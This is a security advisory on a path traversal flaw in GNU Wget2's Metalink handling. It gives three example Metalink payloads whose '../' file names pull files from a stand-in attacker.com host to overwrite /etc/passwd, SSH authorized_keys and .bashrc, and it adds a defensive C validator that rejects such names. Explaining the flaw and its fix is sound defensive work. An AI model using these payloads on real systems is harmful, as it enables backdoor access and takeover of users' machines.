Advisory

Critical GNU Wget2 flaw allows attackers to overwrite sensitive files

Take action: Update GNU Wget2 to the latest version to fix the path traversal flaw. Until you patch, do not process Metalink files from untrusted sources and run the tool in a restricted sandbox.


Learn More

GNU Wget2 reports a bug that lets attackers overwrite files on your computer. Wget2 is a tool that downloads files from the web.

The bug is CVE-2025-69194 (CVSS score varies between medium and 9.8), a path traversal flaw. Wget2 fails to check the file paths inside Metalink documents, which are lists of download links. An attacker can use "dot-dot-slash" paths to make a downloaded file escape the download folder and overwrite system files: /etc/passwd to break logins, .ssh/authorized_keys to replace SSH keys and gain remote access, .bashrc to inject a script that runs malware when you log in, or system tools swapped for fake versions to steal data.

Attack examples:

Overwrite /etc/passwd

<metalink>
  <file name="../../../etc/passwd">
    <url>http://attacker.com/fake_passwd</url>
  </file>
</metalink>

Replace User's SSH Keys

<metalink>
  <file name="../../.ssh/authorized_keys">
    <url>http://attacker.com/backdoor_keys</url>
  </file>
</metalink>

Inject Startup Scripts

<metalink>
  <file name="../../../home/user/.bashrc">
    <url>http://attacker.com/malicious_script</url>
  </file>
</metalink>

The developers patched the tool by adding a check called sanitized_filename. The new code rejects paths that start with a slash or a dot and rejects empty names, so downloaded files stay inside the intended folder and cannot reach the filesystem root.
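As an added illustration of the kind of check the patch describes (example code written for this advisory, not Wget2's own sanitized_filename), here is a C helper that vets a Metalink file name before it is used as a write path. It goes one step beyond the leading-slash-or-dot rule by also rejecting any "." or ".." component anywhere in the path, so a name such as files/../../.ssh/authorized_keys is caught as well. The function name and the sample names are assumptions constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* Decide whether a Metalink <file name="..."> value may be written relative
 * to the download directory. Rejects empty names, absolute paths, names that
 * start with '.', separator-terminated names, and any "." or ".." component.
 * Hypothetical helper for illustration; not Wget2's real sanitized_filename(). */
static bool metalink_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;                         /* empty name */
    if (name[0] == '/' || name[0] == '\\' || name[0] == '.')
        return false;                         /* absolute or dot-prefixed */
    size_t n = strlen(name);
    if (name[n - 1] == '/' || name[n - 1] == '\\')
        return false;                         /* ends in a separator: no file name */

    /* Walk each '/'- or '\\'-separated component and reject "." and "..". */
    const char *p = name;
    while (*p) {
        const char *end = p;
        while (*end && *end != '/' && *end != '\\')
            end++;
        size_t len = (size_t)(end - p);
        if (len == 0)
            return false;                     /* "a//b": empty component */
        if ((len == 1 && p[0] == '.') || (len == 2 && p[0] == '.' && p[1] == '.'))
            return false;                     /* traversal component */
        p = *end ? end + 1 : end;
    }
    return true;
}
/* Constructed sample names, modelled on the advisory's examples. */
static const char *const samples[] = {
    "iso/debian.iso",
    "../../../etc/passwd",
    "/etc/passwd",
    "files/../../.ssh/authorized_keys",
    ".bashrc",
};

int main(void)
{
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-36s %s\n", samples[i], metalink_name_is_safe(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Only the first sample is accepted; the other four are rejected before any file is opened, which is the point at which a downloader must stop a traversal attempt.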

Users should update Wget2 as soon as possible. Do not trust Metalink files from strangers. Check the official repository for the latest code, or update through your operating system's update tool.